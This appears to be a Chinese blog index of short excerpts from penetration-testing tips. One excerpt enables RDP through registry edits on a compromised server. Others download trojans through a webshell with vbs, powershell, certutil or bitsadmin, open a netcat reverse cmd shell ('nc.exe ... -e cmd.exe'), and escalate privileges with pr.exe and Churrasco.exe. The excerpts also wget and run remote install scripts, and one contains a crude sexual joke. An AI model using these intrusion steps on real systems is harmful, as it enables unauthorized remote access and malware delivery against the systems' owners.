渗透过程中,关掉防火墙,直接就查看远程端口,如果未开启,就用命令开启,并尝试远程登陆连接。 显然,这种方法在实际渗透中都不常使用了,多数都是通过端口转发的方式的方式链接。 具体方法如下: 注:主要是通过向服务器注册表查询关键值查看状态。 查询 3389端口是否被更改,查出的数字为当前远程连接端口 REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber 开启3389端口dos命令(开启XP&2003终端服务) 方法 一 :REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 / […]
Author: 系统自定义
linux上一键安装VPN脚本
按行执行命令: wget https://www.jozxing.cc/vpn/vpn.sh chmod a+x vpn.sh 然后出现: which do you want to?input the number. 1. install VPN service 2. repaire VPN service 3. add VPN user 输入 1 回车后即可,会自动给出用户名和密码。
XSS平台和谷歌
openshift一键搭建反向代理谷歌
1.首先,需要在openshift上创建一个diy项目,这里不多说。然后用putty连接22端口到此项目,便于远程命令执行。 2.通过putty执行命令: ①cd /tmp ②wget –no-check-certificate https://www.jozxing.cc/google/jove.sh ③chmod 711 jove.sh ④./jove.sh 然后就是漫长的等待,别问我等多久?这个足够你另开一台电脑,看个High片撸一管了。 但是,别忘了五分钟之内敲一次回车,要不然,命令执行窗口会与vps会话自动断开。 所以。。。。单手撸一会吧。 3.安装好以后,你就可以打开你的域名,格式(xxxx-xxxx.rhcloud.com)访问查看ngxin+php是否成功, 然后再访问xxxx-xxxx.rhcloud.com/info.php,可以看到php的相关信息。 说明 […]
windows电脑使用Filezilla 连接Openshift免费空间方法
1.先下载PuttyGen,主要用来生成公钥和导出私钥 2.复制密钥到Openshift的Settings里面。 3.然后用Filezilla连接的时候,选择PPK后缀名的私钥。 4.直接链接,私钥切勿删除,可放在Filezilla目录下。
windows用DOS下载文件的多种姿势
有时候通过webshell会遇到无法上传马的现象,那么,可以试试通过shell创建个文件,然后后缀名为vbs,通过vbs脚本下载远程木马。下载后,通过webshell的命令执行尝试。代码如下:————————————————————————- 或者新建vbs脚本如下: 或者使用powershell下载 或者使用bitsadmin.exe 或者使用certutil 或者使用js下载
Webshell 提权小技巧
Cmd路径:c:\windows\temp\cmd.exe Nc 也在同目录下,例如反弹cmdshell: “c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe”通常都不会成功。 而直接在 cmd 路径上输入:c:\windows\temp\nc.exe 命令输入:-vv ip 999 -e c:\windows\temp\cmd.exe 却能成功。这个不是重点 我们通常执行 pr.exe 或 Churrasco.exe 的时候也需要按照上面的方法才能成功。